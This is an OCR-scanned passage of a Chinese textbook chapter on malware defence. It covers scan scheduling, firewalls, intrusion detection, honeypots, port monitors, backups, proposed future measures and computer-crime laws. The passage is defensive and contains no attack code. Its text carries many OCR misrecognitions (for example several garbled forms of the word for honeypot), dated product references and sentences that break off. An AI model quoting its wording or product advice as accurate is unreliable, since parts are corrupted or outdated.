如 每 个 周一 的 早上 对 所 有 的 文件 进行 扫描 。 如 果 全 体 最 终 用 户 不 会 介意 ,这 就 不 是 一 个 坏 
消息 。 可 是 ,很 多 用 户 不 愿意 在 他 们 使 用 计算 机 工作 前 等 待 30 分 钟 的 扫描 时 间 。 如 果 想 做 
定时 扫描 ,最 好 选择 在 高 峰 时 间 以 外 的 时 候 进行 。 

另外 一 些 管理 员 刚 好 走向 了 另外 一 个 极端 方向 ,他 们 禁止 了 所 有 的 扫描 ,允许 用 户 决 定 
何 时 开始 扫描 , 称 为 按 需 扫描 。 工 作 站 仅仅 是 在 需要 的 时 候 再 进行 检查 ,就 等 于 和 几乎 没有 
保护 一 样 。 依 赖 于 定时 扫描 或 按 需 扫描 都 会 使 得 新 的 感染 在 扫描 工作 之 间 发 生 , 这 并 不 是 
一 个 好 的 选择 。 

根据 经 验 , 按 预先 定义 的 文件 扩展 名 (或 全 部 文件 ) 对 进入 的 文件 扫描 ,将 是 一 个 最 好 的 
成 本 效益 比 的 选择 。 如 果 系 统 在 安装 反 恶 意 代码 扫描 前 是 干净 的 ,就 只 需 扫 描 新 的 文件 。 
很 多 组 织 采用 混合 的 方法 : 邮件 服务 器 扫描 所 有 进出 的 邮件 ; 文件 服务 器 扫描 所 有 预先 定 
义 文件 扩展 名 的 进入 文件 ; 在 非 高 峰 时 间 定时 对 全 部 文件 进行 扫描 ; 使 用 的 工作 站 都 设置 
了 预先 定义 的 文件 类 型 的 实时 保护 。 这 种 混合 的 方法 工作 效果 良好 。 当 有 新 的 文件 类 型 引 
人 (如 . SHS 文件) 时 ,应 当 及 时 把 新 的 文件 类 型 添加 到 默认 扫描 中 。 

2. 基于 Internet 的 扫描 

一 些 反 恶意 代码 公司 都 有 通过 Internet 发 布 到 PC 上 的 产品 ,如 McAfee 的 myCIO. 
com(http://www. mycio. com) 。 一 个 客户 端的 程序 安装 到 本 地 计算 机 上 ,但 是 更 新 .报告 
和 其 他 的 能 力 存 储 到 Internet 上 。 尽 管 他 们 的 努力 赢得 了 好 评 , 但 其 产品 并 不 是 普通 台式 
机 客户 端的 替代 品 ,它们 安装 .扫描 过 于 缓慢 。 如 果 用 户 在 一 个 已 经 被 感染 了 的 计算 机 上 安 
装 它们 ,很 可 能 会 有 混乱 情况 的 发 生 。 

3. 新 软件 加 入 到 系统 

很 多 应 用 软件 需要 在 安装 它们 以 前 禁止 恶意 代码 扫描 软件 。 如 果 建 议 这 样 做 或 
README 文件 提 到 了 这 些 问题 ,请 按照 建议 办 。 当 然 ,这 给 了 恶意 代码 一 条 进入 系统 的 通 
道 。 除 非 建议 中 明确 指出 关闭 保护 软件 或 经 历 了 很 多 次 的 安装 失败 ,否则 不 建议 关闭 保护 
程序 来 安装 一 个 新 的 软件 。 如 果 第 一 次 安装 过 后 新 的 程序 无 法 正常 工作 ,建议 卸载 它 ,然后 
关闭 扫描 引擎 ,再 重新 安装 一 次 。 


12.5.4 额外 的 防御 工具 


不 能 仅仅 只 依靠 恶意 代码 扫描 引擎 就 希望 在 与 恶意 代码 的 “战斗 ”中 取得 胜利 。 下 面 将 
介绍 一 些 其 他 工具 ,这 些 工具 无 法 保证 拒 恶 意 代码 于 千里 之 外 ,但 是 却 可 以 加 强 系统 的 安 
全 性 。 

1. 防火墙 

对 于 任何 一 个 公司 或 任何 一 个 单独 接 入 Internet 的 PC 而 言 ,防火 墙 是 一 个 基本 的 防 
御 组 件 , 对 于 宽带 连接 也 是 如 此 。 防 火 墙 在 它 最 基本 的 级 别 ,可 以 通过 段 口 号 和 IP 地 址 防 
范 网 络 通信 。 一 个 好 的 防火 墙 策略 允许 预先 设置 好 的 端口 打开 ,而 关闭 其 他 所 有 的 端口 。 
如 果 一 个 程序 ,如 木马 ,力图 通过 一 个 封闭 的 端口 建立 一 个 Internet 会 话 ,这 个 企图 不 会 成 
功 ,并 且 会 被 记录 在 案 。 更 重要 的 是 ,防火 墙 可 以 制止 黑客 对 网 络 或 PC 的 攻击 企图 和 
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探测 。 

企业 应 该 考虑 那些 拥有 信誉 度 和 第 三 方 安全 组 织 ( 如 ICSA Labs) 推 荐 的 企业 级 的 防火 
墙 。 某 些 防火 墙 是 基于 硬件 的 解决 方案 ,如 SonicWall 的 Internet Firewall Appliance 或 
Cisco PIX。 其 他 一 些 防火 墙 , 如 Check Point 的 Firewall-1、Axent 的 Raptor Firewall 和 
Network Associates Gauntlet 等 都 是 基于 软件 的 。 

2. 入 侵 检 测 系统 


和 人 侵 检 测 系 统 (Intrusion Detection System, IDS) 可 以 工作 在 两 种 方式 下 。 一 种 方式 是 
IDS 对 用 户 的 系统 进行 一 次 快照 ,并 报告 任何 试图 改变 被 监视 区 域 的 尝试 ; 另 一 种 方法 复 
杂 一 些 , 它 监视 PC 或 网 络 动态 寻找 恶意 行为 ( 称 为 “攻击 特征 ”) 。 攻 击 特 征 的 一 个 例子 是 
对 多 个 子 网 的 端口 扫描 。 与 防火 墙 一 样 ,IDS 能 够 对 一 个 单独 的 PC 或 企业 级 的 网 络 环境 
进行 安装 和 监视 。 在 保护 一 台 PC 时 , 它 可 能 会 监视 注册 表 的 变化 、 启 动 区 域 的 变化 ,程序 
文件 的 变化 和 可 疑 的 网 络 活动 。 网 络 IDS 监视 大 型 的 网 络 特定 的 事件 。 它 可 以 检测 针对 
一 个 特定 服务 器 的 拒绝 式 服务 的 攻击 特征 。 当 攻击 的 特征 被 发 现时 ,IDS 会 向 管理 员 发 出 
一 个 关于 潜在 攻击 的 警告 。Internet Security Systems、Cisco、Axent 和 Network Associates 
是 入 侵 检 测 系统 方面 的 领导 者 。 

IDS 程序 还 有 两 个 问题 。 首 先 ,IDS 程序 需要 用 反 恶 意 代码 扫描 引擎 定期 更 新 的 特征 
库 。 显 然 这 没有 “和 逃 出 " 反 恶 意 代码 公司 的 视线 ,它们 中 的 一 些 公司 正在 开发 IDS 组 件 。 无 
论 如 何 , 开 发 一 个 反攻 击 的 特征 库 要 比 推出 一 套 恶 意 代码 普通 字 节 集合 的 难度 要 高 得 多 。 
而 且 攻 击 站 点 可 以 有 多 种 绕 过 基于 网 络 的 IDS 程序 的 方法 。 其 次 ,基于 网 络 的 IDS 在 共享 
的 网 络 中 更 加 适用 。 为 了 让 IDS 可 以 识别 企业 级 的 攻击 , 它 必须 同时 对 多 个 网 段 进 行 监 
视 , 并 检测 数据 包 。 在 今天 的 交换 网 络 和 加 密 通 信 中 ,IDS 程序 还 是 有 些 受 限 的 。 

3. 密 锥 

“ 蜜 钠 ”(honey pot) 是 一 个 很 有 趣 的 概念 。 它 们 的 前 提 是 用 户 的 网 络 终究 会 被 黑客 侵 
入 。 蜜 饶 就 是 设计 用 来 模拟 看 起 来 正常 的 重要 服务 器 的 “ 假 ? 系 统 。 一 些 蜜 饶 会 保存 有 百 余 
份 看 起 来 很 可 信 的 讨论 一 个 虚假 的 重要 产品 的 邮件 和 文件 。 它 们 的 目标 是 易于 让 人 攻破 。 
蜜 饶 用 户 的 目标 是 使 得 不 受 欢 迎 的 黑客 将 他 们 的 时 间 花 费 在 蜜 缸 中 ,而 不 造成 任何 实际 上 
的 破坏 ,从 而 给 了 安全 管理 员 足 够 的 证 据 , 如 管理 员 可 以 发 现 黑客 是 如 何 操作 的 ` 他 们 所 使 
用 的 工具 、 他 们 试图 找寻 的 漏洞 是 什么 及 他 们 所 处 的 地 理 位 置 。 

蜜 缸 对 于 恶意 代码 防范 有 一 定 作用 ,一 些 反 恶 意 代 码 公 司 开始 使 用 类 似 蜜 缸 的 模拟 环 
境 来 诱骗 恶意 代码 。 反 恶意 代码 软件 把 可 疑 的 程序 放 到 一 个 模拟 的 环境 中 ,在 这 里 程序 可 
以 自由 地 操作 伪造 的 系统 资源 。 反 恶意 代码 程序 观察 它 所 做 的 一 切 , 如 果 发 现 恶意 行为 ,就 
会 向 用 户 报警 。 用 户 的 真实 环境 也 因为 模拟 蜜 负 的 存在 而 不 受 影响 。 

4 端口 监视 和 扫描 程序 


端口 监视 和 扫描 程序 是 防火 墙 的 一 个 简化 版 , 它 用 来 查找 活动 的 TCP/IP 端口 。 有 关 
“端口 扫描 程序 ”或 "端口 映射 器 ”在 Internet 上 有 很 多 的 类 似 软件 可 以 下 载 , 可 以 用 来 在 
特定 的 计算 机 上 或 整个 网 络 查找 活动 的 端口 。 用 户 一 般 提 交 一 个 目标 IP 地 址 或 地 址 范围 ， 
扫描 程序 就 开始 试探 从 1 到 1024, 甚 至 更 高 的 端口 进行 扫描 。 如 果 用 户 以 前 没有 用 过 端口 
扫描 程序 ,就 很 可 能 对 通信 中 所 使 用 的 未 知 端口 而 感到 吃惊 。 
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无 论 如 何 ,如 果 用 户 发 现 了 一 个 不 了 解 的 端口 ,就 需要 跟踪 使 用 它 的 程序 或 进程 。 端 口 
扫描 程序 可 以 告诉 用 户 计 算 机 正在 使 用 端口 。 找 到 那 台 计算 机 并 启动 程序 来 了 解 哪 些 进 程 
或 程序 正在 使 用 特定 的 端口 。 对 于 端口 扫描 程序 而 言 , 比较 难 指出 这 个 端口 起 源 于 哪个 文 
件 或 进程 。FPort 程序 是 一 款 功 能 强大 的 端口 映射 检查 工具 ,使 用 它 能 把 端口 对 应 的 程序 
找 出 来 。 

5. Internet 内 容 扫 描 程 序 

Internet 内 容 扫 描 程 序 (Internet Content Scanner) 是 另外 的 恶意 代码 保护 工具 。 同 一 
般 的 基于 特征 数据 库 的 反 恶 意 代 码 扫描 程序 不 同 的 是 ,内 容 扫 描 程 序 是 寻找 恶意 代码 的 行 
为 。 最 复杂 的 产品 对 于 所 有 的 Internet 下 载 的 代码 都 提供 “ 沙 箱 ” 一 样 的 安全 保护 ,并 提供 
模拟 的 “ 蜜 饶 ? 环 境 , 不 仅仅 只 是 Java applet 被 放 到 沙 箱 里 ,ActiveX 控件 ,VBScript 文件 和 
可 执行 文件 也 是 如 此 。 

Internet 内 容 检查 器 在 保护 用 户 不 受 源 于 HTML 的 恶意 代码 伤害 的 问题 上 的 成 效 是 
不 错 的 ,但 是 无 法 取代 反 恶 意 代码 扫描 引擎 的 作用 。 事 实 上 , 绝 大 多 数 的 内 容 检查 器 无 法 检 
测 所 有 的 已 知 恶 意 代码 。 如 果 用 户 用 了 一 个 不 是 来 自 反 恶意 代码 厂商 的 内 容 扫 描 程 序 , 建 
议 最 好 也 运行 一 个 反 恶 意 代码 扫描 程序 。 一 些 厂 商 正在 把 Internet 内 容 扫 撒 引擎 和 它们 的 
反 恶 意 代码 扫描 程序 相互 连接 ,这 些 厂家 包括 Trend Micro、Network Associates 和 eSafe。 

6. 其 他 工具 

除了 上 述 工 具 外 ,还 有 很 多 工具 可 以 帮助 检测 和 阻止 恶意 代码 攻击 。 下 面 列举 其 中 的 


改 


(1) SmartWhois? 指 一 个 实用 的 网 络 信息 工具 。 如 果 用 户 有 IP 地 址 主机 名 或 域名 ， 
就 可 以 使 用 SmartWhois 从 公众 信息 中 来 查找 这 个 连接 的 详细 情况 ,包括 国家 、 州 或 省 、 城 
市 、 网 络 供应 方 、 网 络 管理 员 和 技术 支持 联系 信息 。Tamos Soft 也 提供 了 一 个 很 优秀 的 
NetBIOS 扫描 程序 : NBScan 要 比 NBTSTAT. EXE 的 用 户 界面 更 加 友好 一 些 。 

(2) 程序 锁定 : 市 场 上 有 很 多 的 工具 可 以 帮助 管理 员 控 制 哪些 程序 何 时 在 机 器 上 开始 
运行 。SmartLine 公司 的 Advanced Security Control (http://www. protect-me. com/asc) 
就 是 这 样 的 产品 。 尽 管 Windows NT 可 以 自己 通过 严格 的 策略 文件 进行 锁定 ,但 ASC 可 
以 让 一 个 孩子 做 到 这 一 点 。 管 理 员 可 以 预测 哪些 程序 何 时 、 何 地 会 运行 。 未 验证 的 用 户 将 
被 禁止 在 移动 磁盘 、RAM 磁盘 、ZIP 磁盘 上 执行 程序 ,并 且 人 允许 进入 命令 界面 ,如 Telnet。 

(3) 替罪羊 文件 : 就 像 圣 经 中 被 献 祭 的 山羊 一 样 ,“ 替 罪 羊 ” 文 件 (goat file) 是 用 来 为 好 
的 文件 做 伪装 的 。 真 正 的 蔡 罪 羊 文 件 是 空白 的 .等 着 捕捉 一 个 干净 的 恶意 代码 副本 的 
.COM 和 . EXE 文件 。 替 罪 羊 文件 是 在 通常 的 登录 脚本 中 配置 的 文件 ,如 果 有 人 引发 了 恶 
意 代码 感染 ,替罪羊 文件 就 会 被 感染 。 有 一 个 人 侵 检测 软件 或 反 恶 意 代码 检查 比较 程序 监 
视 替罪羊 文件 的 活动 ,并 防止 其 被 修改 。 如 果 有 恶意 代码 试图 修改 文件 ,很 快 就 会 有 警报 发 
出 ,而 且 最 早 被 感染 了 的 文件 就 会 有 希望 很 快 找到 。 

7. 良好 的 备份 


没有 什么 可 以 比 良 好 的 备份 更 好 的 了 。 没 有 任何 防御 计划 是 完美 的 ,而 且 在 很 多 组 织 


® http://www.tamos. cn/content/products/smartwhois/ 。 
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中 恶意 传播 代码 有 时 会 攻破 最 新 的 防御 。 如 果 恶 意 传 播 代 码 攻 击 并 造成 了 无 法 修复 的 破 
坏 , 而 用 户 又 有 好 的 备份 ,就 可 以 保证 将 它 的 损失 降 到 最 低 。 如 果 无 法 确认 备份 的 可 靠 性 ， 
那 就 值得 忧虑 了 。 


12.6 未 来 的 防范 措施 


真正 防止 恶意 代码 传播 的 措施 不 是 恶意 代码 防范 程序 和 防范 计划 ,而 是 致力 于 建立 安 
全 的 操作 系统 ,加 强 职 责 和 减少 默认 的 功能 。 但 是 ,这 些 措施 需要 对 大 量 的 结构 重新 设计 ， 
且 不 可 能 在 短期 内 进行 广泛 的 配置 。 下 面 是 一 些 阻止 恶意 代码 传播 的 防范 措施 。 

(1) 审核 所 有 的 代码 。 

(2) 最 终 的 认证 。 

(3) 更 安全 的 操作 系统 /应 用 程序 。 

(4) 防止 未 授权 的 代码 被 算 改 。 

(5) ISP 扫描 。 

(6) 仅 允许 执行 已 提交 的 内 容 。 

(7) 国家 安全 组 织 。 

(8) 更 严厉 的 惩罚 。 

1. 审核 所 有 代码 

安全 专家 一 直 在 强调 不 运行 不 可 信 代 码 的 重要 性 。 最 理想 的 情况 是 ,每 行 代码 都 没有 
恶意 或 弱点 ,代码 才 可 信 。 但 是 ,很 多 公司 都 没有 这 个 资源 或 时 间 来 修订 所 有 引入 的 代码 。 
因此 ,大 多 数 公司 试图 从 可 靠 的 资源 上 运行 代码 。 但 是 能 信任 这 些 可 靠 资源 吗 ? 现 有 的 可 
利用 代码 原本 并 没有 恶意 。 制 造 商 既 没有 资源 来 正确 地 审核 他 们 自己 的 代码 ,也 想象 不 到 
他 们 的 代码 被 滥用 ,甚至 想当然 地 认为 消费 者 能 容忍 将 来 可 能 会 遇 到 的 不 便 。 更 糟糕 的 是 ， 
发 现 一 年 中 总 有 这 么 好 几 次 ,从 可 靠 的 提供 商 那里 得 到 的 大 型 知名 程序 中 隐藏 着 漏洞 和 故 
意 的 编码 缺陷 ,甚至 不 能 信任 自己 应 该 信任 的 厂商 。 

理想 的 情况 是 ,第 三 方 评 定 人 员 用 可 靠 的 审核 技术 检查 所 有 可 利用 的 代码 ,看 代码 能 否 
通过 审核 。 审 核 过 程 将 查找 缓存 溢出 、 隐 藏 的 后 门 、 编 码 弱点 和 可 用 的 第 三 方 交 互 。 所 有 通 
过 审核 的 代码 都 有 统一 的 标签 来 证 明 它 的 安全 性 。 公 司 只 能 运行 封装 好 的 通过 审核 的 代 
码 。 然 而 这 个 过 程 太 麻烦 ,几乎 不 可 能 实现 。 作 为 第 三 方 的 评定 者 的 黑客 也 对 代码 进行 自 
我 检测 。 合 法 的 第 三 方 评定 将 减 慢 编码 过 程 ,增加 最 终 用 户 的 成 本 。 消 费 者 也 不 愿意 等 待 
并 花费 更 多 的 钱 。 

2. 最 终 的 认证 

匿名 服务 是 恶意 代码 编写 者 的 保护 伞 。 如 果 建 立 了 Internet 连接 ,或 者 有 内 艇 职责 的 
分 布 式 程序 ,那么 它 能 对 代码 作者 进行 认定 并 确保 所 写 的 代码 在 作者 和 执行 人 员 之 间 没 有 
被 改变 。 这 是 微软 认证 代码 的 梦想 。 但是, 它 没 有 很 好 地 被 遵循 ,使 现在 的 应 用 失效 。 相 信 
大 多 数 人 都 有 一 个 默认 的 网 络 系统 ,可 跟踪 每 一 封 E-mail 和 每 一 个 程序 的 来 源 。 可 能 这 就 
意味 着 用 集中 的 认证 中 枢 注 册 所 有 发 布 的 代码 和 E-mail 客户 。 在 E-mail 发 送 或 程序 上 传 
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之 前 ,都 要 经 过 某 种 认证 过 程 。Internet 上 的 每 一 个 数据 包 最 终 能 跟踪 到 它 的 发 送 者 。 

并 不 是 说 在 Internet 上 或 在 计算 机 上 不 应 该 匿名 ,而 是 应 该 提供 匿名 网 络 ,从 而 使 用 户 
能 隐藏 在 屏幕 名 称 的 后 面 ,发布 程 序 代 码 而 不 用 害怕 受到 报复 。 很 多 人 , 像 艾滋 病 患者 和 追 
求 浪漫 的 人 ,需要 不 暴露 身份 地 进行 交流 。 一 定 要 采取 阻止 广告 商 和 其 他 人 跟踪 个 人 的 每 
一 个 变化 。 如 果 不 想 接收 匿名 信 或 不 可 跟踪 程序 (大 多 数 用 户 都 有 这 种 想法 ) ,最 终 的 职责 
事实 上 阻止 了 恶意 代码 ,阻止 了 伪装 的 E-mail, 防 止 了 欺骗 性 的 网 上 商业 行为 ,在 防止 垃圾 
邮件 的 同时 阻止 不 可 知 的 黑客 攻击 。 在 军事 领域 里 存在 两 个 网 络 , 即 安全 的 和 不 安全 的 。 
不 安全 网 络 上 的 信息 不 允许 进入 安全 网 络 。 人 们 能 自由 地 在 任何 一 个 网 页 上 浏览 ,接受 相 
应 的 风险 ,但 至 少 允 许 选择 是 否 匿 名 交流 。 

Internet 已 经 有 工具 使 用 户 达 到 这 个 目的 ,如 密码 学 、IPv6 和 数字 认证 。 用 户 仅 需要 把 
网 络 交流 分 成 两 种 类 型 : 安全 的 和 不 安全 的 。 标 准 化 机 构 一 般 接 受 使 用 工具 来 改良 整个 社 
会 的 方式 。 说 起 来 容易 做 起 来 难 。 每 一 个 软件 和 系统 网 络 工具 都 不 得 不 重新 设计 以 支持 新 
的 安全 结构 。 这 次 通过 之 后 ,高 级 的 黑客 会 尝试 攻击 认证 机 制 。 然 而 ,发 现 的 任何 漏洞 都 会 
很 快 被 修复 ,以 保护 参与 的 用 户 不 受 任何 未 知 的 恶意 攻击 。 在 今天 默认 匿名 的 领域 里 ,因为 
不 能 解决 这 个 问题 ,开发 人 员 就 必须 修复 几 百 个 漏洞 。 

3. 更 安全 的 应 用 程序 

使 计算 机 安全 专家 和 反 恶 意 代 码 开发 者 都 感到 失望 的 是 提供 商 愿意 以 牺牲 安全 性 为 代 
价 来 增加 默认 功能 。Internet 和 Windows 就 是 这 样 的 例子 : 很 多 网 络 协议 允许 匿名 交流 。 
大 多 数 SMTP 邮件 服务 器 会 发 送 任何 人 的 E-mail ,无论 发 送 者 的 邮件 地 址 是 否 合 法 ,或 者 
是 否 来 源 于 网 络 内 部 。FTP 和 WWW 功能 也 是 基于 匿名 数据 的 传送 。 微 软 有 许多 已 发 布 
的 可 利用 代码 ,还 没有 受到 安全 测试 。Windows 脚本 主机 、VBScript 和 Office 宏 语 言 是 他 
们 允许 本 地 系统 管理 的 几 种 较 易 使 用 的 技术 。 许 多 Windows 计算 机 可 以 具备 更 强健 的 默 
认 安 全 设置 ,但 他 们 宁愿 以 牺牲 安全 性 为 代价 提高 其 他 功能 。 

就 像 Java 一 样 , 更 多 的 默认 安全 选项 从 一 开始 就 可 以 构建 一 种 语言 .一 个 应 用 ,或 者 一 
个 操作 系统 。Java 开发 者 理解 他 们 语言 的 潜在 后 果 , 为 了 安全 起 见 , 他 们 在 减少 语言 的 既 
定 功能 方面 迈 出 了 勇敢 的 一 步 , 他 们 为 此 备 受 指责 。 尽 管 如 此 , 仍 有 未 签名 的 Java 恶意 代 
码 或 蠕虫 曾经 广泛 传播 过 。 签 名 的 Word 宏 或 ActiveX 控件 仍 有 许多 安全 隐患 。 它 们 的 黑 
白 模型 表明 一 旦 同意 该 对 象 运行 ,就 可 以 对 用 户 的 系统 做 它 想 做 的 任何 事情 。 但 很 少 有 人 
知道 这 些 代码 会 做 些 什 么 。Java 在 默认 的 安全 模型 通过 允许 用 户 查 看 签名 的 applet 权限 
而 提供 帮助 。 因 此 ,用 户 需 要 更 多 的 像 Java 这 样 的 安全 沙 箱 机 制 。 

每 次 一 种 新 的 应 用 程序 或 操作 系统 发 布 时 ,安全 专家 都 要 请 求 销售 商 制定 更 多 的 默认 
安全 措施 。 但 由 于 安全 需要 花费 时 间 和 金钱 ,因此 用 户 宁 愿 承 担 这 种 冒险 。 对 许多 人 来 说 ， 
终端 用 户 接受 带 有 bug 的 软件 .乏味 的 安装 过 程 ,以 及 由 于 恶意 性 代码 而 造成 几 天 的 停工 
损失 , 却 不 去 追究 销售 商 的 责任 ,这 是 不 合理 的 事情 。 

4. 阻止 未 授权 的 代码 被 算 改 

所 有 恶意 代码 均 以 某 种 方式 操纵 本 地 系统 ,或 者 是 通过 修改 操作 系统 文件 ,或 者 是 修改 
应 用 文件 。 这 种 修改 要 么 以 未 授权 的 方式 使 用 操作 系统 ,要 么 在 自动 启动 区 中 自动 执行 。 
在 阻止 恶意 性 代码 修改 本 地 系统 方面 ,开发 人 员 还 有 许多 工作 要 做 。 例 如 ,如 果 一 个 程序 将 
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要 把 自己 置 于 用 户 的 AUTOEXEC. BAT 文件 或 注册 表 自 动 启动 区 ,就 应 该 强制 性 提示 用 
户 。 现 在 ,程序 在 修改 之 前 仅 会 请 求 用 户 的 允许 。 

除非 是 经 过 中 央 管 理 进 程 的 允许 ,和 否则 禁止 改变 任何 应 用 程序 或 操作 系统 。Windows 
的 系统 文件 检查 器 和 文件 保护 器 上 实现 了 这 种 管理 进程 。 所 有 的 程序 都 将 被 署名 , 当 未 署 
名 的 程序 要 求 修改 文件 时 ,操作 系统 将 拒绝 修改 或 恢复 做 过 的 修改 。 但 是 ,微软 的 这 种 努力 
非常 脆弱 , 它 很 容易 被 绕 过 ,而 且 给 一 些 合 法 的 程序 和 升级 带 来 问题 。 

研究 者 曾 把 检查 不 必要 文件 修改 操作 的 程序 或 操作 系统 称 为 代码 完整 性 检查 器 (code 
integrity chechers，CRC) 。 早 期 的 CRC 只 在 文件 被 修改 后 才 检 测 出 代码 已 被 自 改 。 现 代 
的 CRC 则 在 文件 被 修改 之 前 首先 检查 代码 完整 性 。 问 题 在 于 如 何 确 定 一 个 修改 是 否 合适 。 
询问 用 户 接受 或 拒绝 修改 对 很 多 恶意 性 代码 来 说 无 济 于 事 。 在 实际 改变 之 前 征求 销售 商 这 
一 招 或 许 管用 。 所 有 的 修改 都 要 经 过 销售 商 的 注册 或 销售 商 的 信任 。 销 售 商 根据 他 们 的 标 
准 来 证 实 代 码 是 完好 的 。 但 是 ,这 个 过 程 非常 烦琐 ,一 些小 的 软件 公司 可 能 负担 不 起 ,因此 
也 就 阻碍 了 大 多 数 合法 代码 的 生产 。 

5. ISP 扫描 

允许 Internet 服务 商 扫描 恶意 代码 或 特洛伊 木马 是 有 意义 的 。 如 果 大 多 数 恶 意 性 代码 是 
通过 网 络 传播 的 ,那么 在 它们 被 下 载 之 前 就 截获 它们 也 是 一 种 办 法 。 如 果 爱 虫 病毒 的 变种 被 
发 布 ,ISP 可 以 在 其 传播 之 前 就 截获 它 。 目 前 有 几 个 具有 反 恶 意 代 码 扫 描 服务 的 ISP 正在 运行 
之 中 。 一 些 销售 商 正 致力 于 载波 类 方法 ,该 方法 可 以 用 于 处 理 ISP 的 可 测量 性 问题 。 
例如 ,Messaging Security? 运行 了 一 个 可 以 扫描 所 有 收 到 的 发 送 的 SMTP 信件 中 的 恶 
意 代码 的 Internet 邮件 服务 。 通 过 使 用 3 个 商业 反 恶 意 代码 方案 ,再 加 上 一 个 他 们 自己 的 
引擎 ,他 们 每 月 能 成 功 地 拦截 或 清除 上 千 种 恶意 代码 。 由 于 很 少 有 恶意 性 代码 能 绕 过 他 们 
的 产品 ,他 们 的 客户 相 比 之 下 能 得 到 更 安全 的 邮件 。 

但 是 ,即使 不 考虑 基于 ISP 扫描 技术 的 性 能 问题 和 成 本 ,该 方案 也 存在 许多 的 问题 。 第 
一 ,基于 Internet 的 扫描 技术 与 其 他 恶意 代码 扫描 方法 一 样 都 存在 固有 问题 。 所 以 ,虽然 该 
技术 是 一 个 好 办 法 ,但 却 不 能 作为 唯一 的 防范 措施 。 第 二 , 随 着 越 来 越 多 的 Internet 数据 流 
被 加 密 ,Messaging Security 这 样 的 办 法 将 会 越 来 越 难 ,除非 把 客户 的 密 钥 告诉 扫描 程序 开 
发 商 ( 这 并 不 是 件 轻松 的 事情 )。 每 一 个 网 络 传输 协议 都 需要 一 大 块 程序 来 检测 恶意 性 代 
码 。Messaging Security 检测 SMTP 数据 流 , 同 时 使 用 十 几 种 其 他 的 协议 。 辅 助 一 个 完整 
的 ISP 方案 必须 包括 检测 HTTP、FTP、IM 及 其 他 数 百 种 协议 的 程序 。 另 外 ,除了 Internet 
之 外 ,恶意 代码 还 可 以 通过 其 他 途径 进入 网 络 , 且 本 地 用 户 也 能 带 来 恶意 代码 ,并 通过 公司 
的 远程 拨号 服务 器 上 传 ,或 者 通过 销售 商 和 合作 伙伴 的 软件 传播 。 尽 管 如 此 ,由 于 大 多 数 新 
的 恶意 性 代码 都 是 通过 Internet 传播 的 ,ISP 扫描 技术 还 是 可 以 大 大 减少 恶意 性 代码 的 
传播 。 

6. 只 允许 执行 许可 内 容 

另外 ,一 个 可 行 的 办 法 是 只 允许 预先 认可 的 内 容 和 程序 进入 计算 机 或 公司 网 络 。 但 由 
谁 来 认可 ,怎样 认可 ,以 及 如 何 实现 仍 是 个 问题 。 一 些 工 具 能 有 限 地 实现 这 些 功 能 ,但 却 没 


四。 https: //www. symantec. com/products/messaging-security。 
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有 一 个 通用 的 标准 适用 于 全 世界 的 计算 机 ,可 用 的 办 法 都 难以 管理 并 且 代 价 昂贵 。 

7. 国家 安全 组 织 

加 强 Internet 安全 需要 政府 的 介入 。 许 多 人 不 相信 政府 可 以 实现 有 效 的 安全 管理 ,或 
者 他 们 不 信任 政府 。 他 们 认为 政府 管制 对 于 设置 安全 标准 和 保护 基础 设施 是 必需 的 。 政 府 
的 行政 命令 办 法 和 程序 确实 可 以 加 强 Internet 安全 并 使 其 成 为 一 个 更 好 的 工作 和 娱乐 的 地 
方 。 正 如 在 DES 中 所 做 的 一 样 ,政府 至 少 可 以 制定 一 个 安全 标准 并 要 求 所 有 的 商业 网 站 

8. 更 严厉 的 惩罚 

被 确认 的 恶意 代码 编写 者 应 该 受到 更 严厉 的 惩罚 ,应 该 判 以 重 刑 。 这 个 办 法 已 经 开始 
使 用 。 在 1970 年 到 1980 年 之 间 ,就 有 被 逮 住 的 年 轻 黑客 为 他 们 的 黑客 行为 坐牢 而 后 悔 不 
已 。 法 律 部 门 越 来 越 善于 跟踪 黑客 犯罪 ,并 把 青少年 同 成 年 人 一 样 看 待 。 少 数 的 黑客 得 到 
重 罚 可 以 警示 其 他 的 恶意 代码 编写 者 。 

总 之 ,用 户 在 自己 的 计算 机 环境 中 使 用 这 些 办 法 确实 可 以 减少 被 * 黑 的 危险 。 当 前 计 
算 机 社会 需要 这 些 安全 措施 。 国 际 间 的 基础 设施 投入 使 用 之 前 ,开发 人 员 必 须 开发 可 行 的 
防范 计划 来 使 大 量 恶意 代码 对 计算 机 和 网 络 的 破坏 达到 最 小 程度 。 


12.7 恶意 代码 犯罪 相关 法 律 法 规 基础 


针对 大 批 的 计算 机 安全 问题 ,世界 各 个 国家 和 地 区 都 制定 了 相应 的 法 律 法 规 。 这 些 法 
律 明确 规定 故意 使 用 恶意 代码 造成 损失 属于 犯罪 行为 。 如 果 制 造 或 传播 恶意 代码 ,并 且 造 
成 了 他 人 系统 的 故障 ,就 可 能 被 指控 违法 。 对 于 安全 专家 来 说 困难 在 于 跟踪 恶意 代码 的 编 
写 者 和 传播 者 ,并 且 证 明 属 于 故意 行为 。 事 实 上 ,每 时 每 刻 都 有 大 量 黑客 人 侵 事件 和 恶意 代 
码 的 传播 ,没有 任何 一 个 司法 部 门 能 够 对 其 中 的 哪怕 一 小 部 分 彻 查 到 底 。 

早 在 1973 年 瑞典 就 颁布 了 有 保护 隐私 权 性 质 的 (个 人 数据 法 》(Personal Data Act), 且 
成 立 了 专门 的 数据 监督 局 。 该 法 是 世界 上 第 一 部 国家 层面 的 数据 保护 法 ,并 在 1998 年 进行 
了 修订 。 瑞 典 数据 法 的 着 眼 点 是 保护 计算 机 系统 存储 的 个 人 数据 ,其 中 规定 了 未 经 授权 访 
问 计 算 机 、 自 改 磁带 上 的 数据 是 犯罪 行为 。 

在 美国 ,1994 年 制定 的 联邦 计算 机 处 罚 法 案 特别 规定 了 在 未 得 到 授权 许可 的 条 件 下 对 
一 台 受 保护 的 计算 机 “故意 传播 程序 、 信 息 、 代 码 、 命 令 或 导致 相关 结果 的 行为 造成 了 损失 
的 ”属于 犯罪 行为 。 对 于 触 法 者 将 被 处 以 监禁 : 如 果 不 是 故意 的 ,将 处 以 一 年 以 下 的 监禁 和 
罚金 ; 如 果 被 证 明 为 故意 所 为 ,那么 将 被 罚款 并 处 十 年 左右 的 监禁 。 法 案 特别 规定 ,即使 发 
现 病毒 编写 者 不 构成 犯罪 ,也 可 以 采取 民事 措施 。 

据 报道 ,2003 年 6 月 3 日 ,我 国 台湾 地 区 的 有 关 部 门 通过 了 一 项 法 律 修 正 草案 ,其 中 包 
